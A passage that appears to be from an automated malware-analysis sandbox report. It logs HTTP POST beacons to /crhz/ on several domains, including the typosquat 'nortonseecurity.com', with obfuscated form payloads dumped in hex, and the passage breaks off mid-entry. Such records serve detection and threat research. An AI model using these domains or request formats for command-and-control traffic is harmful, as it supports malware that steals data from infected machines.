vG=nS2xBiiJ4PmK(NrMuRt-xjJPB39znSOCVuU-Crs7YeCx8-pC0OWdN8vpZcYWUqZZwGZoG5KjLdqgnw6CYfQ9zC9WnMzM5NJp4vr0U4ZK7W7ZMpFvmVFVQsLfkjWz(6kmHLTJOWm7u9qVr3eloVMbzTJqTwBUs8FzhxhDptzaq0Kur0hht8S483Q.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.hayuterce.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.hayuterce.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hayuterce.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 6e 53 32 78 42 69 69 4a 34 50 6d 4b 74 39 37 4d 73 77 74 2d 67 54 4a 4d 4f 58 39 7a 74 79 4f 5a 56 75 49 2d 43 71 6f 72 59 4d 4f 78 28 74 52 43 30 74 75 64 4c 38 76 70 66 63 59 53 5a 4b 5a 44 77 47 4d 54 47 38 6d 4a 4c 62 79 67 6b 54 43 43 65 64 49 2d 34 53 39 75 73 73 7a 44 35 4e 49 7a 34 75 62 77 55 34 64 73 37 56 4c 5a 4e 62 39 76 67 6c 46 53 4a 63 4c 66 6b 6a 57 76 28 36 6b 47 48 4c 72 52 4f 58 7e 72 75 50 69 56 72 53 53 6c 75 32 30 59 6d 44 4a 75 50 67 41 46 6c 39 77 66 6d 44 38 50 70 64 62 56 39 42 36 47 32 6e 46 78 78 70 4c 34 6d 79 75 61 45 70 61 70 42 57 7a 42 42 44 6e 69 49 73 77 79 44 30 56 63 73 4b 63 48 4a 55 41 5f 34 4a 54 76 31 31 76 44 31 54 28 6c 73 4e 66 6a 7e 52 4c 66 4c 41 73 44 54 52 52 48 31 51 31 51 58 46 54 55 30 48 4a 73 57 77 6a 5a 6b 41 34 7a 53 32 48 64 55 4e 30 44 51 50 69 4e 78 41 41 71 47 78 78 71 46 6f 78 68 46 31 76 51 6b 5f 59 46 71 6d 70 69 39 37 71 5a 72 44 78 57 7e 44 35 53 6a 68 75 48 54 31 71 39 35 36 36 4e 41 69 67 63 73 69 46 4f 47 45 32 4f 44 35 32 4a 53 45 6c 6d 79 61 51 6a 7e 72 32 62 41 59 79 5f 7e 37 66 69 53 47 69 78 53 41 51 65 74 36 79 7a 6a 6a 32 63 57 48 63 54 54 68 77 41 64 6c 7e 4d 77 7a 39 38 4f 6c 72 43 73 2d 4f 4a 54 4c 6c 43 69 6f 6f 59 41 64 6b 57 52 65 44 39 58 74 32 77 38 36 73 46 7a 62 43 48 4a 55 79 77 41 59 47 34 34 77 52 44 58 4e 67 36 7a 43 70 65 74 62 79 72 54 38 33 30 78 2d 5a 4c 42 57 57 51 4a 77 55 6f 64 64 51 44 43 74 4d 39 46 68 45 59 47 32 71 65 38 32 7a 42 30 34 42 78 55 6e 63 2d 77 48 69 53 73 62 7a 55 41 6e 36 36 36 43 50 43 57 62 50 44 7a 76 53 44 62 65 61 57 6d 4b 31 33 76 58 45 64 62 64 48 39 51 46 53 72 43 59 48 69 43 38 6d 64 61 41 62 79 75 6e 61 75 62 6d 76 6e 74 35 28 59 72 4b 70 34 5a 4e 70 59 6b 4d 4a 55 70 74 74 4d 6d 31 4b 73 48 44 45 61 63 43 65 50 61 61 46 65 41 58 39 4b 51 32 6c 38 74 52 4d 42 56 56 64 61 52 74 78 58 75 68 52 48 48 59 52 52 43 66 35 65 42 77 41 2d 4d 34 46 72 6b 48 4a 75 47 56 72 62 50 66 63 2d 49 50 59 5a 4e 57 6b 5f 59 57 30 52 38 6c 5a 49 48 41 34 68 31 41 6b 74 57 53 4b 4f 33 30 55 33 77 61 4f 73 75 68 72 4a 56 78 6f 43 47 4d 6c 7a 5a 4e 50 69 66 57 6a 47 65 45 76 51 76 66 6f 68 6d 45 76 5f 73 75 49 6b 4a 4a 45 52 6a 6a 35 56 78 79 5a 61 65 4e 55 69 4b 57 45 72 31 51 50 74 76 38 53 4d 4b 43 4a 42 47 32 49 42 54 6d 7a 53 76 72 42 39 69 4d 63 6e 67 6e 4a 31 70 66 43 42 4f 36 6f 37 65 61 73 4f 78 51 55 50 45 55 5a 75 57 4f 66 5a 62 52 58 4a 63 4c 59 50 78 79 78 5a 75 56 44 35 35 6e 48 66 75 35 57 6a 6b 5a 33 7a 37 50 50 64 67 79 50 50 6e 76 57 5a 56 54 68 33 4e 31 54 69 62 52 39 58 65 67 38 64 67 76 61 78 73 31 44 48 68 54 35 45 34 47 4
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.wylvxing.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.wylvxing.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.wylvxing.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 65 7a 56 65 7e 4d 4f 4e 61 4c 78 77 4f 47 69 46 4f 65 4f 52 34 71 6e 43 28 58 35 72 49 74 4c 51 57 38 62 6c 48 5a 52 47 46 5a 56 6c 65 33 74 35 6b 34 52 52 7e 6c 61 4d 4e 78 45 69 6e 49 78 42 4c 34 5a 30 7a 6e 47 45 55 5a 37 6c 28 6f 56 6e 58 75 56 2d 48 4b 4a 4e 67 62 73 53 6a 35 36 30 7e 2d 4f 70 72 44 64 58 44 6d 62 5a 44 58 68 73 4f 55 73 69 74 55 56 42 4f 50 6c 59 74 7a 61 43 6c 37 34 59 28 44 50 6c 79 4a 68 79 52 79 5a 55 55 62 34 32 62 6e 67 70 43 4b 53 4b 55 62 52 38 66 31 47 41 50 45 62 78 4c 4c 74 71 72 4b 6b 34 6e 74 73 63 49 7a 55 2e 00 00 00 00 00 00 00 00 Data Ascii: vG=ezVe~MONaLxwOGiFOeOR4qnC(X5rItLQW8blHZRGFZVle3t5k4RR~laMNxEinIxBL4Z0znGEUZ7l(oVnXuV-HKJNgbsSj560~-OprDdXDmbZDXhsOUsitUVBOPlYtzaCl74Y(DPlyJhyRyZUUb42bngpCKSKUbR8f1GAPEbxLLtqrKk4ntscIzU.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.wylvxing.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.wylvxing.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.wylvxing.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 65 7a 56 65 7e 4d 4f 4e 61 4c 78 77 4f 6c 4b 46 43 66 4f 52 73 36 6e 44 6d 58 35 72 54 39 4c 55 57 38 58 6c 48 64 68 57 43 71 35 6c 62 30 56 35 6c 65 6c 52 75 56 61 4d 5a 42 45 75 36 34 78 58 4c 34 4d 46 7a 6a 43 55 55 66 62 6c 7e 4a 46 6e 65 4d 39 35 4a 61 4a 50 32 72 73 52 6a 35 36 68 7e 2d 66 67 72 44 4a 74 44 6d 7a 5a 44 46 4a 73 47 45 73 6c 69 30 56 42 4f 50 6c 45 74 7a 62 68 6c 37 68 46 28 47 76 31 79 63 74 79 53 54 35 55 59 59 67 31 4c 6e 67 6c 4b 71 54 36 62 4f 4e 31 58 30 54 6e 5a 33 54 56 4c 5a 52 61 6a 6f 56 38 31 4d 70 61 65 6e 38 53 4f 7a 4e 61 76 52 44 76 45 4c 53 77 37 78 6e 44 58 7a 54 77 72 4f 4c 4b 4f 32 50 6b 7a 4f 6b 67 63 31 30 71 4e 48 4a 53 64 76 33 4a 6e 73 67 67 39 64 75 70 39 55 64 45 46 48 30 35 61 61 68 34 5a 5f 53 74 66 41 6f 4b 68 65 39 36 41 4a 56 52 35 75 42 6a 45 48 39 67 54 37 77 78 66 58 54 47 58 4b 49 5f 48 31 5a 66 57 39 61 65 34 47 6d 36 4c 4f 59 5a 55 72 5a 33 69 31 35 37 51 41 4d 56 28 4a 65 76 41 5a 52 54 36 43 4c 44 31 4e 39 47 72 42 4d 73 6e 5f 4b 53 42 57 34 54 7a 55 4c 49 51 33 5a 35 71 79 77 4a 75 78 62 42 54 65 35 4d 64 45 6c 72 30 4d 6c 63 52 6b 6e 58 5a 59 6d 7a 6e 4e 35 4f 4d 7a 52 59 50 30 36 62 64 76 65 50 45 48 51 49 36 57 36 30 63 5a 37 69 58 68 71 34 51 37 28 4e 4d 6c 7a 54 54 5a 28 68 34 30 4e 6e 39 5a 6e 65 46 4f 58 7a 7a 7a 31 4b 59 52 38 64 7e 69 56 55 4e 4b 46 2d 5a 6d 4b 32 6b 4e 65 66 43 77 6e 38 4a 6b 31 68 57 55 28 67 28 35 51 6a 44 4c 53 42 78 39 51 52 34 35 57 64 73 56 47 73 39 59 31 4f 62 66 73 35 32 70 72 51 69 64 30 77 56 71 49 69 57 64 34 63 64 6f 77 57 65 7a 78 4c 28 36 70 62 55 57 61 46 67 61 7e 57 51 48 69 36 6a 7a 34 47 69 45 32 5f 55 72 65 52 41 44 56 77 71 46 53 48 62 32 79 4d 68 47 76 34 31 42 7e 75 4a 6c 39 6a 64 44 62 33 71 47 59 6d 76 32 69 46 67 69 56 62 6c 5f 7e 4b 6e 42 76 66 36 67 56 35 6b 5a 33 46 73 71 42 7a 5a 44 74 6b 39 79 56 4b 78 6e 6d 59 51 59 39 71 55 4b 50 64 51 6c 79 45 62 76 31 56 58 37 30 43 50 73 33 4f 35 73 76 4a 31 47 46 57 49 50 73 6b 45 34 76 34 76 31 64 7a 58 64 63 5a 79 5f 77 6c 6d 77 6c 79 47 6c 43 5f 32 35 6f 69 49 61 58 38 45 69 72 43 44 44 44 45 4b 4a 4c 49 33 74 6b 71 59 31 4a 5f 6b 63 6e 52 72 6a 39 7a 68 61 6d 32 43 6c 31 51 73 41 36 76 7a 5f 4b 6d 35 50 6e 4d 59 6e 30 74 4c 37 45 54 63 6d 75 37 62 59 46 53 36 2d 65 67 6b 6e 38 43 28 70 53 41 74 38 32 39 7e 6c 43 53 55 6f 55 41 4a 55 6c 45 6f 67 36 53 66 62 32 75 6b 76 65 39 70 66 38 68 75 76 75 2d 51 71 66 44 4f 39 39 37 39 70 67 62 54 6e 39 4b 68 4e 39 47 79 51 6c 35 59 46 4d 39 59 56 43 4f 52 71 65 31 6e 56 6e 34 48 43 53 35 30 74 46 47 43 79 74 66 50 47 4b 73 78 4a 49 6d 62 48 41 6
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.popcors.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.popcors.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.popcors.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 35 45 72 4a 7e 78 37 42 52 6e 52 67 49 67 34 6f 69 51 4d 64 56 55 44 34 70 6f 30 30 56 58 48 38 38 34 64 37 28 53 79 6c 61 6b 4b 64 47 31 54 4d 45 46 69 6b 74 76 75 36 64 56 57 6a 6e 4e 68 41 61 73 55 37 64 62 43 75 62 64 43 64 6f 51 4b 6f 48 4c 72 47 39 35 44 69 42 58 74 66 7a 68 77 58 6c 61 7e 4b 6a 54 31 54 4e 33 75 72 68 31 7a 51 66 44 58 51 46 53 58 59 5a 32 28 6c 72 6e 64 34 28 68 66 75 28 5a 47 44 44 61 54 46 58 49 56 41 57 5a 4e 34 73 50 33 4a 62 7a 4f 5a 76 73 38 4f 50 47 6f 49 47 52 67 42 74 7a 4a 6c 38 4e 49 48 73 4e 4f 4e 7a 49 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: vG=5ErJ~x7BRnRgIg4oiQMdVUD4po00VXH884d7(SylakKdG1TMEFiktvu6dVWjnNhAasU7dbCubdCdoQKoHLrG95DiBXtfzhwXla~KjT1TN3urh1zQfDXQFSXYZ2(lrnd4(hfu(ZGDDaTFXIVAWZN4sP3JbzOZvs8OPGoIGRgBtzJl8NIHsNONzIM.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.popcors.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.popcors.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.popcors.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 35 45 72 4a 7e 78 37 42 52 6e 52 67 4a 44 67 6f 76 58 59 64 55 30 44 37 6d 49 30 30 65 33 48 34 38 34 68 37 28 58 43 4c 64 57 6d 64 47 43 33 4d 45 6d 61 6b 7e 5f 75 36 4b 46 57 6e 70 74 67 5a 61 73 41 47 64 61 79 55 62 65 75 64 75 44 43 6f 42 4a 44 48 7a 70 44 33 46 58 74 59 7a 68 77 34 6c 5a 57 4f 6a 54 78 70 4e 33 6d 72 68 44 6e 51 5a 7a 58 58 4b 79 58 59 5a 32 28 70 72 6e 64 45 28 68 33 32 28 64 53 71 44 70 4c 46 58 74 5a 41 56 36 6b 75 71 50 33 4e 53 54 50 76 7e 73 42 48 4e 77 39 79 50 7a 45 53 28 44 70 47 28 4d 4a 31 35 75 65 6f 6c 4e 54 4e 30 43 51 65 6e 33 4c 79 54 43 59 5f 6a 6c 64 38 34 79 31 39 74 4d 6b 74 33 69 4f 51 7a 45 4b 75 55 34 45 7a 4e 65 65 5a 69 57 31 54 32 58 5a 75 44 51 43 4c 46 38 54 6b 55 6a 47 4e 53 79 4c 75 48 55 78 54 58 41 36 37 31 74 69 58 63 6b 78 78 4d 4d 61 30 74 48 46 33 55 62 58 66 44 5a 59 51 33 32 6d 57 4d 6f 63 41 6a 38 48 69 55 42 45 6c 39 5f 78 44 45 67 61 5f 6c 48 48 2d 44 34 69 31 71 68 4f 32 45 77 66 7a 32 75 4e 39 45 55 55 2d 33 34 61 65 44 6c 69 6f 4d 46 45 31 54 4f 7e 6d 55 33 75 4e 64 68 6f 34 6c 69 37 31 70 44 4b 48 48 48 41 4d 46 4e 68 32 37 50 47 48 70 68 67 39 69 4f 55 74 56 61 35 34 70 54 33 74 30 70 34 64 36 77 43 47 75 37 58 76 6e 71 4d 72 4a 53 35 43 41 4e 57 53 6c 43 78 36 77 33 50 56 78 71 46 45 4a 47 5a 32 44 30 68 56 30 53 31 6e 70 69 4b 4f 4f 58 33 6e 77 47 65 77 4b 6d 44 65 4f 48 6d 78 76 31 74 70 56 6c 34 36 47 77 58 78 70 34 6e 73 43 62 51 34 7e 58 46 65 73 32 4d 31 4f 75 73 36 7e 55 78 35 4e 6b 48 61 79 6d 32 47 4d 4f 59 6d 75 67 50 49 6f 57 61 7a 31 4e 54 35 51 31 70 62 70 64 41 6e 51 68 34 58 61 2d 4c 68 70 6a 79 33 6f 5f 58 77 6b 61 65 6d 7a 77 54 63 78 37 6a 31 37 6b 65 51 35 4a 52 66 75 4a 50 35 46 62 6f 36 76 64 66 51 4e 63 32 42 7a 4e 37 61 50 65 33 70 53 33 30 4a 4b 46 42 35 49 61 77 6c 33 4f 63 4a 6e 72 4b 38 4c 75 78 67 67 41 6b 77 6a 69 4e 56 37 57 4c 4c 76 61 32 67 6b 4e 54 72 38 54 66 4b 73 67 4d 6f 7a 62 74 66 64 47 76 38 67 54 68 74 6e 66 41 77 6a 39 5a 37 36 47 72 58 69 54 78 4d 35 4b 47 73 58 52 59 78 4b 37 56 37 41 33 5a 4b 74 65 77 6c 71 4f 43 62 4c 6b 4e 79 50 30 6d 6a 6f 30 64 68 75 37 42 42 62 53 6e 34 70 4c 4f 73 53 61 53 56 50 6b 75 71 69 63 4d 51 6b 51 75 6d 38 4b 74 32 6a 63 6b 42 51 53 51 73 6b 6e 37 52 54 7a 74 51 46 44 65 75 36 62 68 4b 37 6e 6f 30 52 42 58 59 4a 45 35 7a 54 57 53 5a 45 5a 65 4f 54 78 34 49 31 45 38 65 43 2d 58 61 56 73 47 66 70 64 64 5a 77 4a 6d 44 6e 31 67 49 4d 56 45 6a 59 45 76 4d 45 72 5a 54 6c 58 49 6c 7a 36 78 49 39 57 59 38 4a 53 64 77 7e 42 77 33 38 73 61 34 76 64 45 4d 44 47 66 72 56 56 53 49 69 49 66 79 50 64 35 63 56 42 4b 68 7
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.thepromotionhunter.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.thepromotionhunter.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thepromotionhunter.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 32 4e 70 79 52 74 4f 76 6e 44 6a 4a 64 38 63 6c 51 75 68 61 6a 47 6a 49 36 34 76 6e 62 73 6f 5a 51 54 50 4d 66 52 5a 5a 54 30 5a 30 6a 6d 46 4d 28 48 6e 34 31 41 76 49 50 4e 68 56 53 5f 47 79 34 48 48 34 79 63 32 54 77 37 44 59 5a 4a 42 31 39 36 78 34 46 35 49 63 57 57 57 49 73 44 56 35 73 56 61 61 72 6f 67 52 46 48 77 4a 41 73 48 6d 70 45 6e 6e 46 35 45 62 69 77 43 6b 30 56 5a 37 56 53 53 45 54 78 61 58 6b 61 65 56 79 73 51 54 70 6e 53 51 28 46 32 6b 4f 32 42 48 69 52 39 55 33 45 31 31 28 6d 79 4d 4d 56 30 77 37 6f 7a 43 34 5a 58 6d 66 44 6b 2e 00 00 00 00 00 00 00 00 Data Ascii: vG=2NpyRtOvnDjJd8clQuhajGjI64vnbsoZQTPMfRZZT0Z0jmFM(Hn41AvIPNhVS_Gy4HH4yc2Tw7DYZJB196x4F5IcWWWIsDV5sVaarogRFHwJAsHmpEnnF5EbiwCk0VZ7VSSETxaXkaeVysQTpnSQ(F2kO2BHiR9U3E11(myMMV0w7ozC4ZXmfDk.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.thepromotionhunter.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.thepromotionhunter.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thepromotionhunter.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 32 4e 70 79 52 74 4f 76 6e 44 6a 4a 62 74 4d 6c 57 4a 4e 61 72 47 6a 4c 31 59 76 6e 4d 38 6f 64 51 54 44 4d 66 55 35 77 54 43 4a 30 6d 6c 39 4d 28 6c 50 34 35 67 76 49 62 39 68 52 63 66 47 6f 34 44 76 61 79 63 6d 70 77 39 6a 59 5a 71 35 31 37 5f 74 35 4c 70 49 65 53 57 57 4a 73 44 55 35 73 56 4b 57 72 70 68 5a 46 48 6f 4a 41 61 7a 6d 34 45 6e 6d 50 5a 45 62 69 77 43 53 30 56 59 71 56 53 4b 4d 54 31 7e 48 6b 6f 57 56 31 4e 77 54 71 45 71 52 35 46 32 67 52 47 41 50 69 79 55 48 33 45 6f 77 30 7a 53 78 5a 6b 67 47 7a 50 32 61 68 61 44 4d 42 6b 48 42 62 78 35 64 46 34 73 32 50 65 6a 42 52 35 35 36 71 68 68 42 32 75 42 50 47 35 73 46 49 39 37 39 78 67 53 77 76 33 28 41 37 4a 72 6c 34 58 4e 5f 6d 71 54 52 32 6e 55 76 53 68 46 39 47 76 46 39 41 53 5a 4d 74 75 71 7a 44 64 4b 6f 4c 76 50 5a 63 76 56 6c 6d 76 69 6a 31 78 70 58 61 4d 4c 6e 6e 6c 34 79 75 42 6f 5f 5a 6c 41 56 72 4b 43 74 6f 41 6d 47 62 4b 56 68 6b 34 45 59 47 61 41 4d 44 75 34 36 79 31 7e 31 77 33 50 51 68 61 52 69 48 33 6a 52 7e 52 75 4e 58 62 77 51 42 64 62 6a 74 61 61 41 69 33 28 67 4f 52 74 6f 6f 31 35 4f 6d 32 72 70 49 45 43 70 78 74 56 53 57 50 70 34 56 41 46 77 79 72 47 35 52 5f 47 75 57 52 54 63 54 76 52 33 6c 46 7a 51 34 65 7a 4c 55 63 5a 6c 31 39 70 59 68 30 48 65 65 42 4e 51 47 31 7a 39 78 6f 68 73 44 7a 6c 4f 64 4c 6c 31 45 37 6d 70 4c 72 4f 57 69 43 55 34 65 38 77 6e 28 70 72 6e 38 68 33 62 43 72 45 61 71 5a 53 6f 39 7a 69 58 55 4e 65 67 46 58 55 39 6f 44 30 69 71 54 32 6f 48 37 4d 5a 63 30 35 4c 54 36 67 34 30 4f 74 74 32 52 41 6c 4e 2d 67 44 28 6d 76 76 59 4b 55 68 48 65 46 6e 28 75 4c 4e 41 55 58 4a 77 4f 52 75 58 6a 41 72 31 6f 64 4b 69 4b 35 70 62 49 73 5a 38 47 69 46 77 52 74 4e 34 4b 6c 68 55 66 62 35 4c 43 45 4a 61 49 31 39 66 75 71 34 38 4c 63 68 36 6e 63 58 51 5f 4f 63 64 69 69 44 47 4d 7a 42 74 4c 39 6e 56 72 79 6f 62 32 41 6a 55 55 71 4b 4d 66 45 44 76 6a 33 31 70 63 68 5f 67 6b 52 4d 65 67 4e 75 4c 57 50 77 4d 4c 6c 44 47 44 68 63 64 67 61 53 46 6e 6e 37 4e 66 32 57 79 57 52 4c 71 6c 57 75 72 79 31 47 73 6f 78 79 35 62 4f 30 4a 75 65 58 5a 66 50 50 39 39 4f 59 58 61 7e 4f 70 53 54 5f 41 53 30 76 56 44 6c 6a 74 65 4d 45 76 37 4b 55 33 35 6d 76 57 61 73 59 48 45 30 74 4d 68 35 70 52 45 62 68 39 33 76 49 30 61 45 4f 39 39 6a 48 67 5a 38 71 61 39 45 50 61 31 55 7a 62 72 28 57 73 4b 65 46 63 73 61 63 68 54 32 64 48 57 6a 41 56 71 43 76 61 31 43 6f 72 56 6b 37 6c 75 48 5a 48 44 44 7a 77 55 7a 76 41 4a 37 69 62 36 71 4f 4d 69 75 43 37 6f 36 4e 70 4c 51 58 50 2d 6f 75 74 77 46 78 6c 6f 4e 32 6f 67 33 37 36 6b 63 2d 7e 39 49 44 71 67 46 46 62 4
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.nortonseecurity.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.nortonseecurity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nortonseecurity.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 6a 30 5a 61 46 43 49 59 7e 62 73 6d 38 2d 54 67 34 41 64 7a 68 57 4a 77 37 47 37 66 68 63 53 72 44 32 35 39 4d 51 41 39 62 68 68 6b 48 5f 51 4d 78 45 39 66 45 52 71 64 6f 35 36 53 4b 35 67 39 4a 73 5a 51 33 66 58 62 73 75 4d 31 69 76 79 34 45 59 45 53 28 65 6b 56 43 52 76 53 74 34 75 38 73 75 34 68 51 51 76 32 31 64 6b 37 6c 30 45 59 72 46 55 51 73 69 7a 62 7e 65 52 4b 52 42 45 6a 43 57 33 56 33 77 31 37 42 70 50 6e 76 52 32 70 65 47 36 6f 30 46 37 36 4a 50 6f 62 74 76 7e 4f 42 63 70 53 6d 6d 48 49 69 42 48 64 48 33 32 6b 57 56 67 32 7a 6c 73 2e 00 00 00 00 00 00 00 00 Data Ascii: vG=j0ZaFCIY~bsm8-Tg4AdzhWJw7G7fhcSrD259MQA9bhhkH_QMxE9fERqdo56SK5g9JsZQ3fXbsuM1ivy4EYES(ekVCRvSt4u8su4hQQv21dk7l0EYrFUQsizb~eRKRBEjCW3V3w17BpPnvR2peG6o0F76JPobtv~OBcpSmmHIiBHdH32kWVg2zls.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.nortonseecurity.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.nortonseecurity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nortonseecurity.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 6a 30 5a 61 46 43 49 59 7e 62 73 6d 38 64 4c 67 36 68 64 7a 70 57 4a 33 30 6d 37 66 37 73 53 76 44 32 39 39 4d 56 67 74 62 54 74 6b 48 73 59 4d 79 6d 56 66 47 52 71 64 28 70 36 57 45 5a 67 76 4a 74 35 6d 33 61 7a 68 73 74 67 31 6a 4f 69 34 47 62 73 52 73 75 6b 74 54 42 76 56 74 34 75 54 73 75 70 70 51 51 37 4d 31 64 4d 37 35 57 63 59 74 31 55 54 67 43 7a 62 7e 65 52 4f 52 42 46 32 43 57 76 7a 33 30 52 72 42 5f 4c 6e 75 77 57 70 4e 31 69 72 79 46 37 32 58 5f 6f 49 74 4d 66 5a 5a 75 51 5a 6f 6e 36 70 31 67 58 47 4c 77 7a 50 4b 6b 4a 32 6d 52 63 71 52 36 69 66 33 78 34 6b 59 64 32 4e 6d 48 67 51 6a 74 78 4f 4b 31 37 70 64 4a 48 4b 4f 43 69 75 35 37 37 59 30 52 64 67 36 78 68 5f 7e 64 4d 4b 44 6e 6b 61 6e 42 51 6c 56 30 38 61 4c 63 58 5a 4f 58 68 41 57 6d 4e 36 44 30 65 5f 6a 72 35 6c 6f 33 30 57 53 35 54 2d 64 6c 5a 52 4e 38 4b 30 51 51 68 42 4f 38 68 46 36 46 46 68 63 4e 6b 36 6a 79 54 48 67 6b 6b 71 37 4f 7e 62 35 64 75 48 67 45 76 47 55 66 76 79 64 6c 33 7a 79 72 41 79 4a 6d 33 35 61 53 37 77 30 6f 45 34 37 74 4b 52 37 72 75 74 70 73 28 6e 61 39 49 75 30 65 45 48 34 78 37 42 43 31 34 6e 6b 49 56 62 37 54 75 75 78 49 30 72 4c 6c 48 79 58 6e 34 4e 51 33 33 54 50 57 71 4f 6f 63 38 63 34 35 59 30 55 48 55 56 58 77 59 4c 55 78 37 4f 77 32 76 35 68 36 6f 52 68 67 54 36 66 51 76 36 30 59 46 42 53 63 6d 76 4b 39 4a 65 49 51 77 61 6d 75 4b 70 48 74 4f 31 36 58 72 75 55 4d 52 4a 78 66 75 57 37 4c 6a 37 43 58 31 78 35 36 61 7a 69 65 76 43 72 65 4b 6a 73 67 50 75 55 67 50 4c 28 35 53 68 68 39 62 54 6e 50 36 74 6c 64 28 36 65 70 66 62 35 67 46 75 57 6a 7a 33 6a 6c 6f 73 79 53 4f 63 4d 71 68 5f 30 6d 34 76 69 50 71 6b 7a 58 5a 7a 68 41 64 64 6c 42 77 48 6c 69 61 48 51 45 55 79 35 38 78 69 79 58 66 5f 6c 79 68 66 36 78 4c 30 75 47 67 34 55 78 76 43 67 5f 6e 36 59 36 41 77 69 4b 32 4d 52 36 6a 42 4f 30 54 6f 75 49 6d 5f 37 71 79 76 44 6a 44 38 41 65 65 55 51 46 59 74 4f 51 4b 5a 4b 48 68 63 47 49 56 5a 54 78 33 35 31 33 31 6e 34 59 76 59 28 4b 4b 67 41 74 73 34 33 70 78 2d 39 73 65 6f 4f 30 67 37 4c 32 33 2d 45 56 51 63 6b 6c 59 30 57 47 7e 67 76 31 53 53 6a 58 33 58 63 35 68 48 53 7a 6b 5a 71 51 46 59 6d 77 39 45 70 72 54 30 6f 56 58 36 39 48 7e 53 30 65 42 6d 43 65 39 63 67 51 45 77 42 44 66 6c 32 58 4a 72 43 66 69 49 68 73 54 4e 43 4d 4f 52 71 72 72 53 73 68 68 71 36 4d 46 46 6f 64 59 71 4e 46 6b 5a 52 56 73 78 65 4b 6b 72 37 42 46 52 72 58 7a 57 4a 49 6f 57 4f 38 64 6e 56 38 35 53 57 4e 6f 43 28 4f 65 5a 67 67 68 6a 55 78 35 6f 49 61 65 78 67 56 68 7a 62 4a 50 6b 78 72 54 75 32 4a 55 4b 53 43 6b 5a 77 72 74 59 56 61 57 58 59 34 4e 76 4
          Source: unknownNetwork traffic detected: IP country count 11
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 30 Jan 2023 12:39:57 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
